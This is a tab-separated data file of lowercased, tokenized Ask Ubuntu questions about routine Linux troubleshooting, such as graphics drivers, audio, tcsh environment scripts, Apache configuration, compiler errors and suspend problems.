523599	fglrx : dim screen until brightness key pressed	i reported this at https : //bugs.launchpad.net/ubuntu/+source/fglrx-installer/+bug/1360218 three weeks ago but it is still unassigned and no one has commented on it but myself . it is a lenovo g50-45 laptop with amd/ati radeon apu a4-6000 with r2 graphics . when i boot up ubuntu 14.04.1 64 bit using fglrx ( or fglrx-updates ) 2:13.350.1-0ubuntu2 , the screen gets very dim at lightdm and remains dim in ubuntu desktop until i press one of the two brightness keys or change brightness in system settings . even though the screen is dim , the brightness slider in system settings or the brightness on-screen display shows that brightness is set at the maximum . so does the following command : cat /sys/class/backlight/acpi_video0/brightness it does not matter whether i increase or decrease brightness with the function keys or the slider in system settings , the screen will immediately brighten up after touching any of the brightness keys or the system settings slider . two instances of xorg.0.log are attached to the bug report : one before touching a brightness key and one after it . no improvement with fglrx 14.100-0ubuntu1 built with ubuntu-amd-catalyst-install 3.9 either .
523600	why is my disc always blank after a reportedly successful burn ?	after the tools report a successful burn , the disk appears to be blank . i tried the burn with brasero and k3b multiple times . any suggestions to actually burn the cd ?
523601	can ubuntu be used to print from school networked printers ?	i have looked through some questions but have n't found any direct answers- i am considering a chromebook because of the cheap price , but not being able to connect to my school 's networked printers would be a deal breaker . i read that ubuntu can be used on chromebooks , but can it be used to print from printers on a network ?
523602	need to override keyboard shortcut	i 'm using ubuntu 14.04 for my development purpose . i have installed synapse app and have configured it to launch on ctrl+backspace shortcut . the problem arises when i 'm using my netbeans ide/some other ide and i use ctrl+backspace for intellisense ; in this case it launches synapse . i find this very irritating and counter-productive . i do n't have idea how can i override this so that when i 'm using my ide it 'll consider ctrl+backspace to give code suggestions . can anyone help to resolve this ? thanks
523605	how do i disable the guest session from lubuntu 14.04 ?	i 'm fairly new to ubuntu and one issue that i have with it is that there is no simple , easy way ( as far as i know and please tell me if you have found a better way ) to set up fool-proof parental controls . what i did with ubuntu is to disable the guest account , password protect the admin account , and install procon latte content filter on all the basic userâs firefox web browsers and configure them accordingly . i got a new computer and decided to put lubuntu 14.04 on it . works great . only issue so far : i can not figure out how to disable the guest session . i searched around , but all the documentation tells me to sudo edit a file that doesnât exist in lubuntu 14.04 . what does exist are these : advanced @ dimension5150 : /usr/lib/lightdm $ ls guest-session-auto.sh lightdm-greeter-session lightdm-guest-session advanced @ dimension5150 : /etc/lightdm $ ls lightdm.conf.d lightdm-gtk-greeter-ubuntu.conf lightdm-gtk-greeter.conf users.conf so , could someone please tell me how to disable the guest session , or remove internet access ( networking ) from it ?
523606	fsl.sh can not be sourced	i need to install fsl and freesurfer as part of running connectome mapper . freesurfer required changing the shell to tcsh in order to configure its folders . now for fsl , i have to add to .profile the line bash /etc/fls/5.0/fls.sh , but this line does nothing in fact so when i log in to the console and send echo $ flsdir i get in fact nothing . how can i use this sh script in the tcsh console ? the fsl.sh file is given by : # fsl configuration file # - to be sourced by the user , typically in .bashrc or equivalent # - note that the user should set # written by mark jenkinson , fmrib analysis group , university of oxford # modified for debian by michael hanke < michael.hanke @ gmail.com > # clean out previous fsl path components : do not edit the next two lines path= $ ( echo $ path | tr `` : '' `` \n '' | grep -v `` /usr/lib/fsl/ '' | tr -s `` \n '' `` : '' | sed 's/ : $ // ' ) ld_library_path= $ ( echo $ ld_library_path | tr `` : '' `` \n '' | grep -v `` /usr/lib/fsl/ '' | tr -s `` \n '' `` : '' | sed 's/ : $ // ' ) # # # # set up standard fsl user environment variables # # # # # debian has a fixed fsldir fsldir=/usr/share/fsl/5.0 # possum is installed in the same directory possumdir= $ fsldir # add the fsl binary path to the search path path= $ path : /usr/lib/fsl/5.0 # the following variable selects the default output image type # legal values are : # nifti , nifti_pair , nifti_gz , nifti_pair_gz # this would typically be overwritten in $ { home } /.fsl/fsl.sh if the user # wished to write files with a different format fsloutputtype=nifti_gz # comment out the definition of fslmultifilequit to enable # fsl programs to soldier on after detecting multiple image # files with the same basename ( e.g . epi.hdr and epi.nii ) fslmultifilequit=true # the following variables specify paths for programs and can be changed # or replaced by different programs , by default set sensible debian-defaults fsltclsh=/usr/bin/tclsh fslwish=/usr/bin/wish fslbrowser=/etc/alternatives/x-www-browser # the following variables are used for running code in parallel across # several machines ( i.e . for fdt ) # for a cluster engine setup see below fsllockdir= fslmachinelist= fslremotecall= # if set , tell fsl to use sun gridengine to submit jobs instead of running them # directly on the machine . if unset , no attempt will be made to utilize # gridengine , even if it is running . by default sge is not utilized . # fslparallel=1 # mail setup for gridengine jobs . see man qsub ( -m option ) for all possible # settings . by default no email is sent . fslcluster_mailopts= '' n '' # default queue for job submissions # fslcluster_default_queue= '' all.q '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # do not add anything below this line # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # export fsldir possumdir path fslmultifilequit fsloutputtype fsltclsh \ fslwish fslbrowser fsllockdir fslmachinelist fslremotecall # configure the linker search path for debian fsls internal shared libraries ld_library_path=/usr/lib/fsl/5.0 $ { ld_library_path : + : $ { ld_library_path } } export ld_library_path # load user configuration if [ -f `` $ { home } /.fslconf/fsl.sh '' ] ; then '' $ { home } /.fslconf/fsl.sh '' ; fi
523608	apache 2.4 howto block directory listing from all but localhost or from local net ( ip )	i know that indexes controls the printing of a directory listing if there is no index.html or index.php etc within a block . in apache 2.4 , what is the best ( least messy way ) to only serve directory listings if the request comes from either localhost ( or local network ie 192.168.10 for example ) . in the various config files there are many blocks and i would like to keep it clean an simple . the prime reason for this is security - i seem to have continuous hacking attempts.. thanks
523612	sourcing a sh file is illegal in tcsh	after solving that one , i tried to source the sh script editing csh.cshrc . i added the following lines in its end : . /etc/fsl/5.0/fsl.sh setenv freesurfer_home/home/user/freesurfer source $ freesurfer_home/setupfreesurfer.csh but i get the error /usr/sbin/ . : permission denied.. i tried to change it to source /etc/fsl/5.0/fsl.sh bt then i got the error illegal variable name.. the file i 'm trying to source is : # fsl configuration file # - to be sourced by the user , typically in .bashrc or equivalent # - note that the user should set # written by mark jenkinson , fmrib analysis group , university of oxford # modified for debian by michael hanke < michael.hanke @ gmail.com > # clean out previous fsl path components : do not edit the next two lines path= $ ( echo $ path | tr `` : '' `` \n '' | grep -v `` /usr/lib/fsl/ '' | tr -s `` \n '' `` : '' | sed 's/ : $ // ' ) ld_library_path= $ ( echo $ ld_library_path | tr `` : '' `` \n '' | grep -v `` /usr/lib/fsl/ '' | tr -s `` \n '' `` : '' | sed 's/ : $ // ' ) # # # # set up standard fsl user environment variables # # # # # debian has a fixed fsldir fsldir=/usr/share/fsl/5.0 # possum is installed in the same directory possumdir= $ fsldir # add the fsl binary path to the search path path= $ path : /usr/lib/fsl/5.0 # the following variable selects the default output image type # legal values are : # nifti , nifti_pair , nifti_gz , nifti_pair_gz # this would typically be overwritten in $ { home } /.fsl/fsl.sh if the user # wished to write files with a different format fsloutputtype=nifti_gz # comment out the definition of fslmultifilequit to enable # fsl programs to soldier on after detecting multiple image # files with the same basename ( e.g . epi.hdr and epi.nii ) fslmultifilequit=true # the following variables specify paths for programs and can be changed # or replaced by different programs , by default set sensible debian-defaults fsltclsh=/usr/bin/tclsh fslwish=/usr/bin/wish fslbrowser=/etc/alternatives/x-www-browser # the following variables are used for running code in parallel across # several machines ( i.e . for fdt ) # for a cluster engine setup see below fsllockdir= fslmachinelist= fslremotecall= # if set , tell fsl to use sun gridengine to submit jobs instead of running them # directly on the machine . if unset , no attempt will be made to utilize # gridengine , even if it is running . by default sge is not utilized . # fslparallel=1 # mail setup for gridengine jobs . see man qsub ( -m option ) for all possible # settings . by default no email is sent . fslcluster_mailopts= '' n '' # default queue for job submissions # fslcluster_default_queue= '' all.q '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # do not add anything below this line # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # export fsldir possumdir path fslmultifilequit fsloutputtype fsltclsh \ fslwish fslbrowser fsllockdir fslmachinelist fslremotecall # configure the linker search path for debian fsls internal shared libraries ld_library_path=/usr/lib/fsl/5.0 $ { ld_library_path : + : $ { ld_library_path } } export ld_library_path # load user configuration if [ -f `` $ { home } /.fslconf/fsl.sh '' ] ; then '' $ { home } /.fslconf/fsl.sh '' ; fi how can i run this script ?
523613	upgrade to gcc-4.9 broke clang++	recently i have upgraded to gcc-4.9 but it totally broke my clang++ and i am unable to compile anything . error i am getting : in file included from src/tester.cpp:11 : in file included from /usr/include/boost/progress.hpp:22 : in file included from /usr/include/boost/timer.hpp:20 : in file included from /usr/include/boost/config.hpp:40 : in file included from /usr/include/boost/config/select_stdlib_config.hpp:18 : /usr/bin/../lib/gcc/x86_64-linux-gnu/4.9/../../../../include/c++/4.9/cstddef:51:11 : error : no member named 'max_align_t ' in the global namespace using : :max_align_t ; output of clang++ -v : ubuntu clang version 3.4-1ubuntu3 ( tags/release_34/final ) ( based on llvm 3.4 ) target : x86_64-pc-linux-gnu thread model : posix found candidate gcc installation : /usr/bin/../lib/gcc/i686-linux-gnu/4.9 found candidate gcc installation : /usr/bin/../lib/gcc/i686-linux-gnu/4.9.1 found candidate gcc installation : /usr/bin/../lib/gcc/x86_64-linux-gnu/4.8 found candidate gcc installation : /usr/bin/../lib/gcc/x86_64-linux-gnu/4.8.2 found candidate gcc installation : /usr/bin/../lib/gcc/x86_64-linux-gnu/4.9 found candidate gcc installation : /usr/bin/../lib/gcc/x86_64-linux-gnu/4.9.1 found candidate gcc installation : /usr/lib/gcc/i686-linux-gnu/4.9 found candidate gcc installation : /usr/lib/gcc/i686-linux-gnu/4.9.1 found candidate gcc installation : /usr/lib/gcc/x86_64-linux-gnu/4.8 found candidate gcc installation : /usr/lib/gcc/x86_64-linux-gnu/4.8.2 found candidate gcc installation : /usr/lib/gcc/x86_64-linux-gnu/4.9 found candidate gcc installation : /usr/lib/gcc/x86_64-linux-gnu/4.9.1 selected gcc installation : /usr/bin/../lib/gcc/x86_64-linux-gnu/4.9 i have tried uninstalling gcc and clang and installing it again but it did not help . do you have any suggestions how to fix it ?
523614	`` ../lib/libfreenect.so.0.5.0 : undefined reference to `libusb_get_parent ' '' when building libusb	i am trying to install openkinect on ubuntu . i get this error when i run tesla @ ubuntu : ~/libusb/libfreenect/build $ sudo make install [ sudo ] password for tesla : [ 51 % ] built target freenectstatic linking c executable ../bin/freenect-chunkview ../lib/libfreenect.so.0.5.0 : undefined reference to `libusb_get_parent' collect2 : ld returned 1 exit status make [ 2 ] : *** [ bin/freenect-chunkview ] error 1 make [ 1 ] : *** [ examples/cmakefiles/freenect-chunkview.dir/all ] error 2 make : *** [ all ] error 2 yes , i have installed libusb and libusb-1.0-0-dev i have a 32 bit ubuntu 12.04 virtual machine ( vmware player ) i even tried installing on ubuntu 14.04 , but with same error . i have enabled usb 3.0 support too .
523618	unable to play video in jpanel using vlcj in ubuntu 13.04	i am trying to play video in jpanel using vlcj in ubuntu , there is no error . my project builts successfully . but do not plays video . when i run code jframe comes for a while . when i use same code in windows . it plays video and works successfully , but not in ubuntu . following is output window . following is my code : ( i am using vlcj-3.0.1 ) import com.sun.jna.nativelibrary ; import java.awt.borderlayout ; import java.io.file ; import javax.swing.jframe ; import javax.swing.jpanel ; import uk.co.caprica.vlcj.component.embeddedmediaplayercomponent ; import uk.co.caprica.vlcj.player.embedded.embeddedmediaplayer ; class playerpanel extends jpanel { private file vlcinstallpath = new file ( `` -- -- -- -- -- -- -- -path of vlc player ( installed ) -- -- -- -- -- -- -- '' ) ; private embeddedmediaplayer player ; public playerpanel ( ) { nativelibrary.addsearchpath ( `` libvlc '' , vlcinstallpath.getabsolutepath ( ) ) ; embeddedmediaplayercomponent videocanvas = new embeddedmediaplayercomponent ( ) ; this.setlayout ( new borderlayout ( ) ) ; this.add ( videocanvas , borderlayout.center ) ; this.player = videocanvas.getmediaplayer ( ) ; } public void play ( string media ) { player.preparemedia ( media ) ; player.parsemedia ( ) ; player.play ( ) ; } } class videoplayer extends jframe { public videoplayer ( ) { playerpanel player = new playerpanel ( ) ; this.settitle ( `` swing video player '' ) ; this.setdefaultcloseoperation ( exit_on_close ) ; this.setlayout ( new borderlayout ( ) ) ; this.setsize ( 640 , 480 ) ; this.setlocationrelativeto ( null ) ; this.add ( player , borderlayout.center ) ; this.validate ( ) ; this.setvisible ( true ) ; player.play ( `` -- -- -- -- -- -- -- -path of video we want to play -- -- -- -- -- -- -- -- -- -- -- '' ) ; } public static void main ( string [ ] args ) { new videoplayer ( ) ; } } and plz tell me which path to give for vlc player in ubuntu . there are more than 5 folders with name vlc . one is in /usr/share/ and other is in /etc/ and so on .
523619	no sound from headphone jack - hp pavilion 871	i have gone through many questions citing this same issue . the sound comes out of my laptop speakers but not through the headphone jack . if i plug in an hdmi cable , the sound does come through that if i select it in the sound settings . so far , i have tried adjusting the sound in the alsamixer to ensure it 's not muted . using the command gksudo gedit /etc/modprobe.d/alsa-base.config and adding the following lines to the bottom of the config file , each tried individually and the computer restarted after every change . < options snd-hda-intel model=auto > < options snd-hda-intel model=laptop > < options snd-hda-intel model=hp > < options snd-hda-intel model=hp-871 > i even ensured that the hda soundcard was selected in the alsamixer using the f6 shortcut . can someone please help ? i watch tv shows on my computer and use the desktop speakers plugged into the headphone jack for sound . the last thing i will mention is that the original last line of the alsa-base.config file read as follows < # keep snd-usb-audio from beeing loaded as first soundcard > i assumed `` beeing '' was spelled wrong and corrected it .
523620	why does my dvd drive not mount ?	my dvd drive does not mount on ubuntu 14.04 , when opening dvd through vlc it shows these errors : playback failure : dvdread could not open the disc `` /dev/sr0 '' . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/sr0 ' . check the log for details .
523626	why am i stuck at `` verifying dmi pool data '' ?	i tried both usb and live cd installing , but i always get `` stuck at the verifying dmi pool data screen '' . i 've got desktop pc , acer e360 with 1gb ram and a 2ghz cpu . what can i do to complete the installation ?
523629	how to configure mod_rewrite correctly while using cakephp ?	this at first might look like a duplicate question but i have done 10 hours of research on internet and tried almost everything i 've found but no luck with mod rewrite . most of the post/tutorials on internet are old and they have n't updated their article since then . i can see with phpinfo ( ) , that i have successfully loaded the mod_rewrite module . next i know that i have to change allowoverride none to allowoverride all and few more changes on apache 's default.conf file . since i do n't have a default.conf file i did those changes on000-default.conf , but mod_rewrite does n't work . i also changed the apache.conf file , it still did n't work . i changed all files where i can see < directory > < /directory > but it did n't work . my root directory is not /var/www , in fact it is /var/www/html . here is my 000-default.conf file : < virtualhost *:80 > # the servername directive sets the request scheme , hostname and port that # the server uses to identify itself . this is used when creating # redirection urls . in the context of virtual hosts , the servername # specifies what hostname must appear in the request 's host : header to # match this virtual host . for the default virtual host ( this file ) this # value is not decisive as it is used as a last resort host regardless . # however , you must set it for any further virtual host explicitly . # servername www.example.com serveradmin webmaster @ localhost documentroot /var/www/html # available loglevels : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the loglevel for particular # modules , e.g . # loglevel info ssl : warn errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined # for most configuration files from conf-available/ , which are # enabled or disabled at a global level , it is possible to # include a line for only one particular virtual host . for example the # following line enables the cgi configuration for this host only # after it has been globally disabled with `` a2disconf '' . # include conf-available/serve-cgi-bin.conf < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > < directory /var/www/html > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet how can i get mod_rewrite to work ?
523630	ubuntu 14.04 wont allow me to change my screen resolution to 1920x1080	i have recently moved from windows to ubuntu and iâm having a problem that has been troubling me all day . i have a samsung syncmaster s22b300 monitor which supports up to 1920x1080 resolution and it is connected to my computer through a nvidia gtx 650 ti boost graphics card . i 've tried various drivers and none of them allow me to run ubuntu in full 1920x1080 resolution . i 'm sorry if this has been answered loads of times and i would really appreciate it if someone could direct me to a solution .
523631	audio capabilities not being detected properly	built a new computer that is a dual-boot win7 and ubuntu 14.04 . my motherboard has onboard 5.1/8.1 audio capability , which works fine on windows , but is only detected as a basic audio out on ubuntu . after some investigation i found that it uses the acl891 codec . support for this codec was included in the linux kernel 3.8.y update stream . am i missing something i should have installed/enabled ? i do have sound , but would like to use my 5.1 speakers , as i do watch movies on my computer , and currently only have a single channel out enabled . the motherboard does use dual use jacks - mic and line in doubling as subwoofer out and centre out . could this be the issue ?
523632	spotify linux-preview download error	i 'm trying to download the spotify linux preview onto to computer , which is running ubuntu 14.04 . i 've followed the instructions , inputting the following code : sudo apt-add-repository -y `` deb http : //repository.spotify.com stable non-free '' & & sudo apt-key adv -- keyserver keyserver.ubuntu.com -recv-keys 94558f59 & & sudo apt-get updates -qq & & sudo apt-get spotify-client however , having done that , i recieved the following error message : spotify-client : depends : libnspr4-0d but it is not installable recommends : libavcodec53 but it is not installable or libavcodec52 but it is not installable or libavcodec-extra-53 but it is not installable or libavcodec-extra-52 but it is not installable recommends : libavcodec53 but it is not installable or libavcodec52 but it is not installable or libavcodec-extra-53 but it is not installable or libavcodec-extra-52 but it is not installable if this question has been asked before , could anyone lead me to the answer ? otherwise , can someone help me ? i 've tried numerous other things , but none of them seem to work ...
523633	why do chromium dialogs do not get keyboard focus ?	keyboard access for dialog boxes in chromium has recently become rather annoying . if you open any standard dialog ( e.g . press ctrl-o or ctrl-s in any tab ) , the main chromium window will keep the keyboard focus . the expected behavior , and the actual behavior until recently , was that the dialog box will get the focus . i could press ctrl-` to select the dialog , but i should not have to do that . i suspect that unity is to blame for this , but the following behavior may be coincidental . the chromium icon on the dock shakes when a dialog is opened . it should n't do that if i was the one who opened the dialog , but that 's minor compared to the dialog not getting the focus . i 'm running : ubuntu 14.04 64-bit chromium version 37.0.2062.94 ubuntu 14.04 ( 290621 ) ( 64-bit ) unity 7.2.2+14.04.20140714-0ubuntu1.1 any advice as to why these things are happening ? how can i fix them permanently ?
523636	how to disable announcer ?	i have ubuntu 14.04 on my computer . a few days after i installed it - after reboot i got this loudly unnecessary announcer that tries to tell me everything i do with my mouse and keyboard . i tried to find why it 's starting and how to disable it - but did n't succeed . one thing i can tell - when i kill the process called `` init '' i actually got a logout and when i logged in again it disapeared . how to disable this thing ?
523638	why does ubuntu freeze during reboot ( 14.04 lts ) ?	i 'm new to this whole linux thing , and although i have been able to figure out how to set up ubuntu thus far , there is one issue that bugs me . whenever i attempt to restart the computer , it freezes at the purple screen with the dots and all that . just , completely stops . i have had to remove the battery from my computer to force it to shut down . strangely enough , there is no issue when i use the normal shutdown option . only the reboot option . how can i fix this issue ?
523639	installing desktop environment , ( machine offline )	i tried updating my machine , to ubuntu 13.10 . after update , when i restarted my machine , there was no gui ( no login screen ) , but i could access terminal , and see my files and folders . tried various online advice , but to no avail . it looks like its only desktop environment problem . can i install any ( light weight ) desktop environment , via offline method . like , downloading some files , and putting them in right directories . same problem occurred during 12.10 update . about which you can read at : no login screen after 12.10 ubuntu update desktop machine config : 32bit , intel pentium 4cpu 3.2 ghz , standard vga graphics adapter , 1gb ram thanks , for your time .
523640	how i can disable cpu frequency scaling and set the system to performance ?	my processor is running at 40 % of its maximum speed , i want it to use 100 % of the speed , all the time . i searched on google but the tutorials are very old and they all differ . so , how can i permanently disable cpu frequency scaling and set my system to performance mode ? please , only terminal based solutions , i do n't want applets . i 'm using xubuntu 14.04 x64 .
523641	tv screen not visisble after update ubuntu	i am sorry to ask something that has been asked a lot in this forum . but i am having problems using my tv screens since i updates ubuntu from 12.04 to 14.04 . the problem is that ubuntu is not recognizing my tv screen ( it has in the past , before the update from 12.04 to 14.04 and installing catalyst center from amd ) . here are the things i done : check if the display is visible in either catalyst control center or display ( it wasnt ) check in catalyst control center if a second screen was visible ( it wasnt ) uninstall the amd drivers used for my gpu ( thought maybe that caused the problems ) checked the hdmi kabel ( it worked ) in the console tried ¨fglrxinfo¨ , it says ¨command not found¨ ( guess this means the driver is removed ? ) checked which driver i am using : x.org x server - amd/ati driver wrapper from xserver-xorg-video-ati ( open-source , tested ) tried to reinstall drivers directly from amd website . no luck there since when i try to install it says that my gpu is not supported : ( this is my equipment : a sony vaio vpceb4m1e ( radeon mobility hd5470 ) proper hdmi cabel random samsung tv that always has worked with hdmi ports ( and still does for my ps3 ) sorry i have to ask a question that has been asked before , but i am really stuck here . thank you for your help ! wm
523642	wine software problem	i have installed wine from ubuntu software center and when i try to open a exe file with wine , wine executes , shows a blank blue window for two - three seconds then it closes without any message , i dont know how to fix or what is the problem here , can someone help please ? thanks for your time '' edit '' i 'm trying to run a 2d classic game which runs great on all windows platforms , from xp to 8.1. ubuntu 14
523643	will an ssd make the ubuntu ui more responsive ?	i apologize if this is a duplicate , if it is i was not able to find any actual explanation with google or bing or even searching ask ubuntu . i want to know if an ssd will improve the ubuntu ui or kde desktop . i know that i/o and loading times will be a ton faster than what i had on a 5200 rpm , 250 gb hard disk with disk surface problems , but is there any way i can use it over a hard drive to make the ubuntu ui consistently more responsive ? i want to know if it will solve some , if any , of the stuttering i got on my system before the hard drive failed almost altogether . i 'm asking this on ask ubuntu just because on mac , an ssd seemed to do nothing to ui responsiveness , while on windows , adding a swap drive helped a bit with keeping programs running just fine under heavy multitasking but also really helped with keeping the ui smooth on vista and later in the form of a large pagefile on a small 8 gb esata drive .
523649	14.04 suspends and resumes , but hard power off one minute later	i installed 14.04 on an avatar tellus laptop , with the / partition on the built in ssd , and /var , /home , and swap on the local disk . the system runs normally , except for suspend . the machine will suspend from a timeout , lid close , or request , and the suspend seems to work . the power led has the telltale heartbeat . opening the lid or pushing the power button , will trigger a normal resume . the system resumes quickly , and operates normally ... ..for about 1 minute . it then hard powers off , like the battery had been pulled . a cold reboot proceeds normally after that , and its like nothing ever happened . it does not matter whether i log in or not , or whether a login after suspend is configured . the machine does a hard crash a minute after a resume no matter how long it was off , or what state it was in when it suspended . this happens 100 % of the time , and is time related rather than activity or state related . as a side note , the machine itself supported windows 8 sleep and resume correctly . its not a dual boot scenario , w8 is gone now . to me , there is a short list of possibilities here , most of which have to do with the bios on this machine . it has virtually no configuration options available beyond boot order , and enable/disable the intel management engine and the intel rapid start . i have both disabled at the moment , but other than causing manual/long boot times , enabling these did not change the behavior . i had to install the laptop-mode-tools in order to get around a problem where the machine would not power off ( it would immediately reboot ) , and that cleared the problem up immediately . curiously , the resume-crash existed before i installed the tools , and did not change after . from searching around , lots of people have suspend / resume issues , but the fact that the machine will appear to resume and run properly for a short time seems unique . anybody have any thoughts or ideas on where i should start attacking this ? something set through acpi or something that should not ? i do not know where to look !
523653	failure to upgrade from 12.04 lts to 14.04	i was trying to upgrade to 14.04 , everything vent fine without errors but after reboot the system has crashed . i am getting this error message : mount : mounting /dev/loop0 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg busybox v1.21.1 ( unbuntu 1:1.21.0-1unbuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( inittramfs ) _ i was running linux on a dual boot asus ux31e machine . w7 is still booting normal . thank you in advance for any help .
523654	usb hard drive not showing up under /dev/	i 'm running ubuntu 14.01 on a beaglebone black . i have a usb hard drive that auto mounts if i connect it after the computer have booted . i can then also see the usb hard drive under /dev/ . but if i have the usb hard drive connected when the computer boots up then i ca n't see the hard drive under /dev/ . any suggestions what i can do to fix the issue ?
523655	usb mice not working after moving hd to new machine	i have a hard drive which has ubuntu 14.04 lts and windows 7 hp installed on it , partitioned . i have a mad catz r.a.t.3 mouse , which when i initially installed ubuntu required some configuration but then was working perfectly . i moved the installation hard drive to another computer , and now i can not get a response from either my mad catz mouse or any other usb mouse . i can move the cursor , but i can not click on most things . if i unplug the mouse and plug it back in i may be able to click on 1 or 2 things before the mouse begins playing up again . my usb keyboard and external hard drive both work fine and i have tried all of my usb peripherals in each of the available usb ports on the pc . any advice as to the steps i could take to identify the mouse issue and/or correct it would be appreciated .
523656	save snapshot file	i followed this advice default save directory for gnome-screenshot ? and installed it as the top answer suggested . but the `` screenshot '' does not appear ( see image ) . and here is my installation
523657	grub rescue . can not reach boot configuration . does not boot from usb	so i think i may have messed up pretty badly . yesterday i deleted the partition that had zorin os installed on it . little did i realize that doing that does not fully remove it . to make sure i had it fully removed i did a system restore on windows before i started to install anything ( which i left running on over night ) . this morning when i turned it on , it does straight to grub rescue . no matter what .iso i try to boot , it just will not recognize it . i have tried to use zorin os , the windows 7 os ( to repair - i have windows 8 ) , and even ubuntu to boot it . nothing seems to work . i did use the `` ls ( hdx , y ) / '' to see if there was anything on any of my partitions , but it would always come up `` error : unknown file '' for every single one . so the problem is that it is not booting at all . it does not recognize the usb . i am not sure what to do , please help ? thank you ! edit : do not have a disc drive .
523665	ssd is hot when running ubuntu 14.04	i have reviewed a number of questions here about overheating but nothing seems to impact on my system . my laptop has a intel i-3 chip , nvidia geforce chip ( that appears to be running ok with bumblebee ) and a ssd and hdd . ubuntu 14.04 is the only os installed . i have tlpinstalled . my hddtemp command reports the following after about 30 minutes of use and remains at this temperature . at start up they are about 38°c and 24°c respectively . /dev/sda : kingston sms200s3120g : 58°c /dev/sdb : hgst hts541010a9e680 : 42°c sensors gives me the following acpitz-virtual-0 adapter : virtual device temp1 : +14.0°c ( crit = +120.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +49.0°c ( high = +84.0°c , crit = +100.0°c ) core 0 : +49.0°c ( high = +84.0°c , crit = +100.0°c ) core 1 : +45.0°c ( high = +84.0°c , crit = +100.0°c ) nvidia-smi normally gives me a temp reading of about 40-45°c so far i have been unable to find a way to give me reading from temperature of the intel graphics chip . he heat comes from under the touchpad where the msata ssd is located . this i ca n't understand as i thought part of the advantage of the ssd was that they created little heat . the other thing i have noted is that fan never seems to come on in any heavy way which i was expecting but i think it is working in low mode . fan does not show up in lm-sensors . i do n't have thermald installed as i read somewhere that it can be a bit buggy with haswell chips . i noted on one occasion that when i restarted and went into the bios that fan started to run a bit heavier .
523666	wifi not resuming after suspend	wifi worked fine on my dell inspiron e1505 with broadcom 4311 wifi . since upgrading to 14.04 , wifi does not work after resuming from ( close-the-lid ) suspend . if i then manually put it in suspend again with the keyboard , wifi works on resume ~95 % of the time . output from lspci and lshw follows . lspci | grep -i network 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) lshw *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : efdfc000-efdfffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:15 : c5 : a5:9d : b0 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master > cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 > duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:17 memory : ef9fe000-ef9fffff *-network description : wireless interface physical id : 2 logical name : wlan1 serial : 00:16 : cf:17 : a4:4f capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.13.0-35-generic > firmware=666.2 ip=192.168.1.103 link=yes multicast=yes wireless=ieee 802.11bg >
523667	install knotes problem on ubuntu 12.04	when i try to install knotes by command `` sudo apt-get install knotes '' it shows following reading package lists ... done building dependency tree reading state information ... done e : unable to locate package knotes
523671	installed ubuntu 14 on my acer aspire 4755g ca n't seem to install drivers . help ?	so i bought a ( relatively ) new acer aspire 4755g . it did n't come preloaded with a os so i thought it would be the best time to try out linux . so i installed the latest ubuntu and gave it a go . everything is fairly solid except for the fact that the wifi ca n't seem to work . the touchpad is freaking out even from swipe . audio is also screwed . oddly , the bluetooth is working just fine . i have zero experience with and i really want to try it out . but the i 'm already tripping at the starting line . mind guiding me to finding out how i can fix this ?
523672	it takes forever to delete a particular folder created by bleach bit while freeing disk space	in the last few hours i used the option free disk space in bleach bit which which hung up without completing and it created a huge file of 30 gb which i later manually deleted . i found a new folder named `` axqtsnxqyu '' in the home directly which does n't seem to open properly and when i try to delete it permanently bit a dialog appears saying that timeout was reached . i also could n't read the properties of this folder . it sometimes hangs up ubuntu when i try to delete it .
523673	ps aux for long charactered usernames shows a plus sign	i 'm trying to get an output from ps aux so that it looks like : giovanni 28331 4381 0 15:43 ? 00:00:00 sshd : giovanni @ pts/1 giovanni 28346 28331 0 15:43 pts/1 00:00:00 -bash giovanni 28646 28346 0 15:43 pts/1 00:00:00 ./example.sh however , running this command on ubuntu 14.04 lts , gives the following instead : giovan+ 28331 4381 0 15:43 ? 00:00:00 sshd : giovanni @ pts/1 giovan+ 28346 28331 0 15:43 pts/1 00:00:00 -bash giovan+ 28646 28346 0 15:43 pts/1 00:00:00 ./example.sh so how can i remove these plus signs and instruct the command to show me the whole username instead ?
